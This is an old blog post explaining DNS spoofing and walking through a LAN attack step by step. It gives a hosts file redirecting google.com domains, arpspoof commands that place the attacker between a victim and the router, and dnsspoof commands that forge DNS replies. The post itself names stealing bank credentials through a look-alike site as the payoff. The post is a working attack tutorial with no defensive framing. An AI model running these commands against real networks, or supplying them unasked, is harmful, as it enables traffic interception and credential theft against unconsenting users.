Wednesday, November 25, 2009

DNS spoofing (dnsspoof)

When a web browser requests a page such as 'www.google.com', it sends a dns request to a dns server to resolve the dns name, i.e, 'www.google.com', to its associated ip address. Where dns poisoning comes into play is when that request is sent the web browser is now in a wait for the dns servers reply/answer to the dns query. An attacker can see the request going out and in turn send its own dns reply/answer before the dns server does. Its a race against time and usually if the attacker is on the same subnet or network (1 or a few hops away) from system that issending the request, then usually the attackers response should reach its intended destination before any outside reply does. The dnager in this attack is when the attacker spoofs important websites such as your bank website. His/Her fake web server will have exactly the same interface than the real bank web site. So, the attacker can wait for you to enter your credentials on his website to capture them.

victim: 10.0.0.2
router: 10.0.0.1

Tools:
dnsspoof
**(can also use for this ettercap)

Dnsspoof:
First you need to create what is called a hosts file. In your text editor type the following:
127.0.0.1 www.google.com
127.0.0.1 *.google.com
127.0.0.1 www.google.*

Save this file 'hosts.txt'
Perform a MITM (man in the middle attack):
# arpspoof -i eht0 -t 10.0.0.2 10.0.0.1
# arpspoof -i eth0 -t 10.0.0.1 10.0.0.2

Start spoofing with these commands:
# dnsspoof -i eth0 -f hosts.txt

or if you were sniffing an entire network and not just sniff between the gaetway and one host, you can use a tcpdump filter expression in the end.
# dnsspoof -i eth0 -f hosts.txt host 10.0.0.2

Resources/Good reading:
http://www.securesphere.net/download/papers/dnsspoof.htm
http://wcosughacking.blogspot.com/2008/07/dns-spoof.html
https://calomel.org/dns_spoof.html

No comments:

Post a Comment